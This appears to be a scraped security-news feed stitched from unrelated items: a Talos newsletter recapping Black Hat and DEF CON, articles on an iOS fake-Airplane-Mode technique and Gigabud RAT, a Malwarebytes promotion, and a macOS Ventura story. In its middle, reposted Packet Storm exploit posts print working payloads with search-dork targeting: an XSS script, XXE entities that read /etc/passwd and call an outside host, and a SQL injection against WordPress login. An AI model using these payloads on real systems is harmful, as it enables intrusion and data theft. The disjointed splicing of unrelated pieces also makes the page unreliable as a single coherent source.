Unsurprisingly, it seems like AI was the talk of the town.

Thursday, August 17, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I had a significant amount of FOMO last week seeing everyone out in Vegas. (I was happy to not get conference crud sickness, but it seems like I missed a great time otherwise.)

But, as anyone who works with me could guess, I was following closely online through social media and news reporting. If you’re in the same boat as me and couldn’t attend BlackHat or DEF CON in person, I wanted to use this space to recap what I felt were the top stories and headlines coming out of the various new research that was published, talks, interviews and more.

Unsurprisingly, it seems like AI was the talk of the town. One panel, which featured the former Cyber Czar in the Obama administration, promised coming action from the Biden administration around AI and its intersection with cybersecurity, including an executive order that apparently will be as broad as earlier orders around the U.S.’ broader approach to security.

There were many other panels and talks around AI, along with questions about whether the technology has plateaued after so many companies developed their own ChatGPT-like.

I was also fascinated by several interviews and talks from an FBI official about distributed denial-of-service attacks. I’ve written before about how there’s a renewed interest in DDoS attacks recently, especially those targeting high-profile companies and games.

Two high-ranking government officials gave a joint talk at Black Hat where they said the majority of DDoS attacks are the result of a dispute over business transactions or good ‘ol fashioned video game beef.

The same presenters gave additional details on how the FBI prioritizes stopping DDoS attacks. Chances are, if you’re a bad actor who makes the news for DDoS attacks, the federal government is not far behind.

I also always love the crazy vulnerabilities or hacking methods that come out of both these conferences. A highlight for me was a group of researchers who found a way to hijack one of the most popular automatic card shufflers (fitting for Vegas) to the point that someone could know the order of cards ahead of time in a gambling game.

I’m not quite sure what the actual attack surface is here because the potential hacker would need to install a tiny physical USB device into the shuffler, and I don’t think any casino worker would be thrilled to see you crawling around on the floor, but I do always love to see the downside of putting a USB port on everything.

And there was the brief, but confusing, saga at DEFCON about the pop-up notifications iPhone users were getting asking people to pair with a rogue Apple TV. Turns out it was a harmless prank from one of the attendees, who just wanted to drive home the point that it’s important to really turn off Bluetooth all the way, and not just click the little button in the Control Center.

Lastly, we wanted to thank Viktor Zhora, the deputy chairman and chief digital transformation officer at the State Service of Special Communication and Information Protection for Ukraine, for taking the time to say “Hi” to us on the show floor. He specifically took time out of his day to make sure he could meet Matt Olney, who’s been one of our leaders in helping support Ukraine. Viktor was a speaker at BlackHat and had a very busy schedule of media appearances, so we were flattered that he made sure to see Matt.

**The one big thing**

Since AI was already the talk of the town at Black Hat and DEF CON, we wanted to continue the conversation around tehse tools and the implications on cybersecurity. As one of our incident responders wrote in the latest in our “On the Radar” series, AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders. The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.

**Why do I care?**

AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. For defenders, though, AI also opens the door to new defensive tactics and tools, so it’s important to see the positives and negatives of AI in security.

**So now what?**

There is no real action for the average user to take at this point, but I feel this piece is a good opportunity for everyone to take a step back about what we currently know, and don’t know, about AI and its intersection with security.

**Top security headlines of the week**

**Two police precincts in the U.K. had mistakenly been leaking the personal information of individuals connected to crimes for years.** The UK's Norfolk and Suffolk police constabularies disclosed that, between April 2021 and March 2022, the information was accidentally attached to crime statistics distributed as part of Freedom of Information Act (FOIA) requests. The data includes personally identifiable information related to witnesses, suspects and victims of a variety of crimes, including domestic violence, assaults, thefts and hate crimes. The forces say they are now contacting more than 1,200 people who may have been affected. Representatives from the two departments said in a statement that, “Strenuous efforts have been made to determine if the data released has been accessed by anyone outside of policing. At this stage we have found nothing to suggest that this is the case.” (CSO Online, Politico)

Viktor Zhora, one of Ukraine’s top cybersecurity officials, said at Black Hat that **his country is taking several steps to document what may constitute war crimes committed by Russian state-sponsored actors.** Zhora said that attacks affecting critical infrastructure and communications for civilians could fall under such umbrellas and his team is actively collecting evidence as the kinetic military conflict continues. Speaking alongside Zhora, Jen Easterly, the U.S.’ top cybersecurity official, said the U.S. has learned several lessons from Russia’s invasion of Ukraine, including the importance of assistance from private cybersecurity companies. (CyberScoop, The Record)

**Several years’ worth of Intel chips contains a newly discovered flaw known as “Downfall,”** which is like the Meltdown and Spectre bugs from several years ago. Identified as CVE-2022-40982, the issue could allow the CPU to “unintentionally reveal internal hardware registers to software,” according to a write-up from Google’s security research team. Proof of concept code shows that an attacker could use Downfall to steal encryption keys from other users on a given server and other sensitive data. Downfall affects most CPUs in Intel's 6th through 11th-generation Core lineups for consumer PCs. Most of the affected devices were sold starting in 2015 and may still be available in systems today. Intel’s patch for the issue negatively affects the performance of the CPUs, with some studies finding that performance could dip to 40 percent. (Ars Technica, PC World)

**Can’t get enough Talos?**

*   Cisco XDR: from detection and response to continuity after a cyberattack
*   As Ransomware Gangs Shift To Data Extortion, Some Adopt A New Tactic: ‘Customer Service’
*   Talos Takes Ep. #150: What's the difference between data theft extortion and ransomware?

**Upcoming events where you can find Talos**

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6  
**MD5:** 4c9a8e82a41a41323d941391767f63f7  
**Typical Filename:** !!Mreader.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::sheath

Recapping the top stories from Black Hat and DEF CON

Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and main access to an Apple device even when the victim believes it is offline.
The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial

Mobile Security / Vulnerability

Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and main access to an Apple device even when the victim believes it is offline.

The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial Airplane Mode which edits the UI to display Airplane Mode icon and cuts internet connection to all apps except the attacker application," Jamf Threat Labs researchers Hu Ke and Nir Avraham said in a report shared with The Hacker News.

Airplane Mode, as the name implies, allows users to turn off wireless features in their devices, effectively preventing them from connecting to Wi-Fi networks, cellular data, and Bluetooth as well as sending or receiving calls and text messages.

The approach devised by Jamf, in a nutshell, provides an illusion to the user that the Airplane Mode is on while allowing a malicious actor to stealthily maintain a cellular network connection for a rogue application.

"When the user turns on Airplane Mode, the network interface pdp\_ip0 (cellular data) will no longer display ipv4/ipv6 ip addresses," the researchers explained. "The cellular network is disconnected and unusable, at least to the user space level."

While the underlying changes are carried out by CommCenter, the user interface (UI) modifications, such as the icon transitions are taken care of by the SpringBoard.

The goal of the attack, then, is to devise an artificial Airplane Mode that keeps the UI changes intact but retains cellular connectivity for a malicious payload installed on the device by other means.

"After enabling Airplane Mode without a Wi-Fi connection, users would expect that opening Safari would result in no connection to the internet," the researchers said. "The typical experience is a notification window that prompts a user to 'Turn Off Airplane Mode.'"

To pull off the ruse, the CommCenter daemon is utilized to block cellular data access for specific apps and disguise it as Airplane Mode by means of a hooked function that alters the alert window to look like the setting has been turned on.

It's worth noting that the operating system kernel notifies the CommCenter via a callback routine, which, in turn, notifies the SpringBoard to display the pop-up.

A closer examination of the CommCenter daemon has also revealed the presence of an SQL database that's used to record the cellular data access status of each app (aka bundle ID), with a flag set to the value "8" if an application is blocked from accessing it.

"Using this database of installed application bundle IDs we can now selectively block or allow an app to access Wi-Fi or cellular data using the following code," the researchers said.

"When combined with the other techniques outlined above, the fake Airplane Mode now appears to act just as the real one, except that the internet ban does not apply to non-application processes such as a backdoor trojan."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode


Dell BIOS contain a Time-of-check Time-of-use vulnerability in BIOS. A local authenticated malicious user with physical access to the system could potentially exploit this vulnerability by using a specifically timed DMA transaction during an SMI in order to gain arbitrary code execution on the system.



CVE-2023-28075: DSA-2023-152: Security Update for a Dell Client BIOS Vulnerability

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

**EMH CMS 0.1 Cross Site Scripting**

Posted Aug 16, 2023

Authored by indoushka

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | c58615aff6cd57a5ca22a34be62372e9e81249eb20b812f9a35ccd440af33052

Download | Favorite | View

**EMH CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : EMH CMS v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(64-bit)                                             | | # Vendor    : http://www.theemhglobal.com/                                                                                       |  | # Dork      : Designed by EMH TheEmhGlobal                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/freedomcentreinternationalorg/icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,973)
*   Arbitrary (16,202)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,280)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,437)
*   Encryption (2,370)
*   Exploit (51,900)
*   File Inclusion (4,222)
*   File Upload (974)
*   Firewall (821)
*   Info Disclosure (2,775)
*   Intrusion Detection (892)
*   Java (3,044)
*   JavaScript (859)
*   Kernel (6,674)
*   Local (14,453)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,777)
*   Root (3,584)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,373)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,778)
*   Web (9,668)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,944)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,470)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,734)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,822)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,573)
*   Other

EMH CMS 0.1 Cross Site Scripting

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

**eLitius 1.0 Backup Disclosure**

Posted Aug 15, 2023

Authored by indoushka

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

tags | exploit, root, info disclosure

SHA-256 | 37a6ad9ab40e37e23d7cbfe01ee9334c417b3339776c4691b7ae872e89ddb896

Download | Favorite | View

**eLitius 1.0 Backup Disclosure**

    ====================================================================================================================================| # Title     : eLitius v1.0 Backup Disclosure Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://elitius.com/download/eLitius_v_1_0.tar.gz                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use payload : /backup/[+] http://wingro/cmim/backup/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,960)
*   Arbitrary (16,198)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,432)
*   Encryption (2,370)
*   Exploit (51,887)
*   File Inclusion (4,222)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,773)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,674)
*   Local (14,452)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,773)
*   Root (3,582)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,887)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,372)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,775)
*   Web (9,664)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,938)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,457)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,727)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,816)
*   UNIX (9,290)
*   UnixWare (186)
*   Windows (6,573)
*   Other

eLitius 1.0 Backup Disclosure

E-Fun CMS version 5.0 suffers from an XML external entity injection vulnerability.

====================================================================================================================================  
| # Title     : E-Fun CMS V5.0 XML external entity injection Vulnerability                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : http://www.e-fun.com.tw/                                                                                           |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

XML supports a facility known as "external entities",   
which instruct an XML processor to retrieve and perform   
an inline include of XML located at a particular URI.   
An external XML entity can be used to append or modify   
the document type declaration (DTD) associated with an   
XML document. An external XML entity can also be used   
to include XML within the content of an XML document. 

Now assume that the XML processor parses data originating   
from a source under attacker control. Most of the time   
the processor will not be validating, but it MAY include   
the replacement text thus initiating an unexpected file   
open operation, or HTTP transfer, or whatever system ids   
the XML processor knows how to access. 

below is a sample XML document that will use this functionality   
to include the contents of a local file (/etc/passwd)

target : http://127.0.0.1/landtopcomtw/webadmin/

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE indoushka [  
  <!ENTITY indoushka SYSTEM "file:///etc/passwd">  
]>  
<xxx>&indoushka;</xxx>

POST /webadmin/_chkpasswd.php HTTP/1.1  
Content-type: text/xml  
Host: landtop.com.tw  
Content-Length: 175  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE dt5fqyt [  
  <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">  
]>  
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>

[+] Affected items :

/webadmin/   
/webadmin/_chkpasswd.php   
/webadmin/index.php 

[+] The impact of this vulnerability :

Attacks can include disclosing local files,   
which may contain sensitive data such as passwords   
or private user data, using file: schemes or relative   
paths in the system identifier. Since the attack occurs   
relative to the application processing the XML document,   
an attacker may use this trusted application to pivot   
to other internal systems, possibly disclosing   
other internal content via http(s) requests.

[+] How to fix this vulnerability :

If possible it's recommended to disable parsing of XML external entities.

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

E-Fun CMS 5.0 XML Injection 

WordPress Core version 5.6.2 appears to suffer from an xpath injection vulnerability via the log parameter.

    # Exploit Title: WordPress Core 5.6.2 - Xpath Injection# Date: 13/08/2023# Exploit Author: Behrouz Mansoori# Vendor Homepage: https://wordpress.org# Software Link: https://wordpress.org/download/releases# Version: 5.6.2# Tested on: Mac# [ VULNERABILITY DETAILS ] : #This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries.#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.# [ Sample Request ] :POST /wp-login.php HTTP/2Host: localhostCookie: wordpress_test_cookie=WP%20Cookie%20checkContent-Length: 125Cache-Control: max-age=0Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9log=test' and extractvalue (rand(), concat (0x7e, version () ))--+&pwd=test&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=https%3A%2F%2Ftarget_site%2Fwp-admin%2F&testcookie=1

WordPress Core 5.6.2 XPath Injection

Account holders of over numerous financial institutions in Thailand, Indonesia, Vietnam, the Philippines, and Peru are being targeted by an Android banking malware called Gigabud RAT.
"One of Gigabud RAT's unique features is that it doesn't execute any malicious actions until the user is authorized into the malicious application by a fraudster, [...] which makes it harder to detect," Group-IB

Account holders of over numerous financial institutions in Thailand, Indonesia, Vietnam, the Philippines, and Peru are being targeted by an Android banking malware called **Gigabud RAT**.

"One of Gigabud RAT's unique features is that it doesn't execute any malicious actions until the user is authorized into the malicious application by a fraudster, \[...\] which makes it harder to detect," Group-IB researchers Pavel Naumov and Artem Grischenko said.

"Instead of using HTML overlay attacks, Gigabud RAT gathers sensitive information primarily through screen recording."

Gigabud RAT was first documented by Cyble in January 2023 after it was spotted impersonating bank and government apps to siphon sensitive data. It's known to be active in the wild since at least July 2022.

The Singapore-based company said it also identified a second variant of the malware minus the RAT capabilities. Dubbed Gigabud.Loan, it comes under the guise of a loan application that's capable of exfiltrating user-input data.

"The targets were individuals lured into filling out a bank card application form to obtain a low-interest loan," the researchers said. "The victims are convinced to provide personal information during the application process."

Both malware versions are spread via phishing websites, the links to which are delivered to victims via SMS or instant messages on social media networks. Gigabud.Loan is also distributed directly in the form of APK files sent through messages on WhatsApp.

Targets who are approached on social media are often coerced into visiting the sites under the pretext of completing a tax audit and claiming a refund.

While Android devices have the "Install from Unknown Sources" setting disabled by default as a security measure to prevent the installation of apps from untrusted sources, the operating system allows other apps on installed on the device, such as web browsers, email clients, file managers, and messaging apps, to request the "REQUEST\_INSTALL\_PACKAGES" permission.

Should a user grant permission to such apps, it allows the threat actors to install rogue APK files while bypassing the "Install from Unknown Sources" option.

Gigabud functions a lot like other Android banking trojans by requesting for accessibility services permissions to perform screen capturing and logging keystrokes. It's also equipped to replace bank card numbers in clipboards and perform automated fund transfers through remote access.

On the other hand, Gigabud.Loan functions as a tool to collect personal information such as full name, identity number, national identity document photo, digital signature, education, income info, bank card information, and phone number under the guise of submitting a loan request to the bank.

The findings follow the discovery of 43 rogue apps on the Google Play Store that load ads while the device's screen is turned off. The apps, with cumulative downloads of 2.5 million, have since been taken down or updated by the developers to remove the ad fraud component.

McAfee said the adware, once installed, seeks users' permissions to exclude the apps when saving battery and allow it to draw over other apps, effectively opening the door to further malevolent attacks, such as loading ads in the background and displaying phishing pages.

The ad fraud library used by the apps also employs delay tactics to evade detection and can be remotely modified by the operators using the Firebase messaging service, lending it an additional layer of complexity.

The disclosure comes as the U.S. Federal Bureau of Investigation (FBI) is warning of an increase in scammers pretending to be recovery and tracing companies that can help victims of cryptocurrency investment scams regain lost assets.

"Recovery scheme fraudsters charge an up-front fee and either cease communication with the victim after receiving an initial deposit or produce an incomplete or inaccurate tracing report and request additional fees to recover funds," the FBI said.

On top of that, the agency has cautioned that cybercriminals are embedding nefarious code in mobile beta-testing apps masquerading as legitimate cryptocurrency investment apps to defraud potential victims by facilitating the theft of personally identifiable information (PII) and financial account data.

"The apps may appear legitimate by using names, images, or descriptions similar to popular apps," the agency explained. "Cyber criminals often use phishing or romance scams to establish communications with the victim, then direct the victim to download a mobile beta-testing app housed within a mobile beta-testing app environment, promising incentives such as large financial payouts."

In these schemes, threat actors contact potential victims on dating and social networking apps and build trust with the ultimate aim to entice them into downloading pre-release versions of the apps.

"The victims enter legitimate account details into the app, sending money they believe will be invested in cryptocurrency, but instead the victim funds are sent to the cyber criminals," the FBI said.

It's worth noting that the abuse of Apple's TestFlight beta testing framework to conduct pig butchering scams was highlighted by cybersecurity firm Sophos last year.

Recent waves of the campaign, also called CryptoRom, have weaponized Apple's enterprise and developer ad-hoc app distribution schemes to deliver bogus crypto apps in a bid to slip past restrictions that prevent users from downloading iOS apps outside of the App Store.

In other instances, a seemingly innocuous app is trojanized after it is approved and published to the Apple and Google app storefronts by altering the remote code to point to an attacker-controlled server to introduce malicious behavior.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Gigabud RAT Android Banking Malware Targets Institutions Across Countries

Categories: Business
PCMag readers named Malwarebytes the #1 most-recommended security software vendor in its list of Best Tech Brands for 2023. 



(Read more...)




The post PCMag ranks Malwarebytes #1 cybersecurity vendor appeared first on Malwarebytes Labs.

PCMag, one of the most trusted publications by IT professionals, named Malwarebytes the #1 most-recommended security software vendor on its list of Best Tech Brands for 2023. 

The ranking is based on a Net Promoter Score (NPS), a composite rating based on customer reviews from PCMag's Reader’s Choice and Business Choice surveys, meaning the score reflects real user feedback.

Malwarebytes ranked #3 out of ALL tech brands, ahead of Apple and Bose, with a NPS score shooting up from 77 in 2022 to 83 in 2023 for security suites, demonstrating the growing trust IT teams and MSPs place in our EDR and MDR solutions.

**Why readers chose Malwarebytes **

There are a number of reasons why PCMag readers ranked Malwarebytes as the #1 cybersecurity brand ahead of vendors like Webroot and Bitdefender. It all starts with superior prevention.

Malwarebytes consistently ranks #1 in third-party evaluations, with a 100% detection rate with zero false positives. For example, we’re the only vendor to win every MRG Effitas certification & award in 2022 and so far in 2023 on the rigorous independent lab tests.

The behavior-based detection techniques and proprietary anti-exploit technology of Malwarebytes EDR is proven to detect and block more malware and advanced threats than any other vendor.

But todays IT constrained organizations need endpoint security solutions that not only prevent the most advanced threats, but that are easy to use as well. Malwarebytes’ customers rank our EDR highly for its ease-of-use, remediation capabilities, and total ROI.

**Award-winning EDR Solution **

Malwarebytes EDR has been recognized for having the Best Support, being Easiest to Do Business With, having the Easiest Admin, being the Easiest to Use, Most Implementable, and the Easiest to Set Up.   

> “The Nebula console is one of the most user-friendly interfaces we've come across. We can't recommend it enough.” - Justin N. 

> “Malwarebytes makes it simple to deploy. Additionally, the user interface has minimal impact on the end-user, so its win-win. Support are happy to help when you do hit the occasional bump and the portal is easy to use and very responsive.” - John K. 

**We remediate better**

Unlike other EDR solutions, Malwarebytes is born out of remediation, with a long history of finding and fixing what other solutions miss—as seen in our Remediation Map of Malwarebytes' superior detection in action.  

Automated and thorough malware removal is hard, and vendors too often focus only on deleting the active malicious executables. Malwarebytes' proprietary technology removes dynamic and related artifacts to thoroughly remediate infections and prevent reinfection.

> “Prior to Malwarebytes, we spent many hours and days cleaning up viruses and malware that other products failed to identify and remediate. We now have close to zero need for after infection cleanups which frees us up to do other things.” - Ron M.

**Highest ROI **

Ranked #1 EDR in G2's Summer 2023 report, Malwarebytes provides the best estimated ROI of all endpoint protection suites based on a unique combination of rapid implementation and time to ROI. 

> “The best part about Malwarebytes is the set it and forget it. It has saved us so much time on deployment and remediation that it pays for itself in no time at all.” - Ron M.
> 
> “It keeps our working environment much more secure than our previous solution. Much easier to manage in real time. This thing is a money saver and pays for itself.” - Tyson B.

**Why organizations choose Malwarebytes MDR **

Customers not only love the easy effectiveness of our  EDR; our Managed Detection and Response (MDR) managed service receives high praise too.  

The powerful and affordable threat detection and remediation services of Malwarebytes MDR has rescued many an IT team member from persistent threats and sleepless nights. Drummond, a Florida-based print company, experienced the benefits of 24x7 monitoring and threats investigation to stop attacks firsthand:

“Cyber threats are 24/7, and my team needs to sleep. The MDR team watching our network around-the-clock gives us a chance to sleep without worry. With Malwarebytes MDR backing us up, I also finally got to step away and take a two-week vacation. I'm just glad to know that we have a security team watching over our shoulder and making sure it's all clear.” - Dennis Davis, IT Systems Manager, Drummond 

**Try Malwarebytes for Business today **

Most of all, we appreciate the trust and support of our customers in making Malwarebytes the #1 cybersecurity solution for IT teams and MSPs.  

Interested in seeing why PCMag readers recommend Malwarebytes? Learn more below.

Get a free demo today.

PCMag ranks Malwarebytes #1 cybersecurity vendor

By Habiba Rashid
Renowned Mac security researcher Patrick Wardle recently unveiled potential weaknesses within Apple’s macOS Ventura, shedding light on vulnerabilities…
This is a post from HackRead.com Read the original post: macOS Ventura Background Task Flaws Can Be Exploited for Malware

*   **Background Task Weaknesses:** macOS Ventura’s Background Task Management has vulnerabilities that allow hackers to evade detection and install malware.

*   **Researcher’s Revelation:** Patrick Wardle, a respected Mac security researcher, unveiled these vulnerabilities at the Defcon hacker conference.

*   **Monitoring Tool’s Purpose:** Background Task Management is intended to detect and alert users to software persistence, ensuring data retention after restarts.

*   **Sophisticated Exploitation:** Despite alerts and notifications, Wardle’s research shows that advanced malware can bypass the monitoring system, even without root access.

*   **Apple’s Response Awaited:** Apple has yet to respond to these findings, raising concerns about the efficacy of macOS Ventura’s security enhancements.

Renowned Mac security researcher Patrick Wardle recently **unveiled** potential weaknesses within Apple’s macOS Ventura, shedding light on vulnerabilities in the Background Task Management mechanism. This revelation calls into question the efficacy of Apple’s latest monitoring tool designed to detect and mitigate malware.

Image: Patrick Wardle

During his **presentation** at the Defcon hacker conference held in Las Vegas, Wardle shared insights into how malicious actors can exploit macOS Ventura’s Background Task Management to bypass monitoring and potentially compromise user devices.

The Background Task Management tool, introduced with **macOS Ventura**, aims to detect instances of software “persistence,” which is when malicious software establishes itself on a device and remains active even after restarts. Such persistence is crucial for legitimate applications, ensuring users’ apps, data, and preferences are retained across device reboots.

However, Wardle’s findings suggest that the implementation of this monitoring tool is not foolproof. Apple **added** Background Task Management to send notifications to users and third-party security tools if a “persistence event” occurs, alerting users to unexpected or potentially malicious persistence. Despite this enhancement, Wardle’s **research** demonstrates that sophisticated malware can easily evade the monitoring mechanism.

Wardle’s research focused on pinpointing vulnerabilities within the Background Task Management’s structure. He highlighted that some bypass techniques require root access, effectively granting attackers full control over a compromised device, allowing them to manipulate persistence notifications and install malware without user awareness.

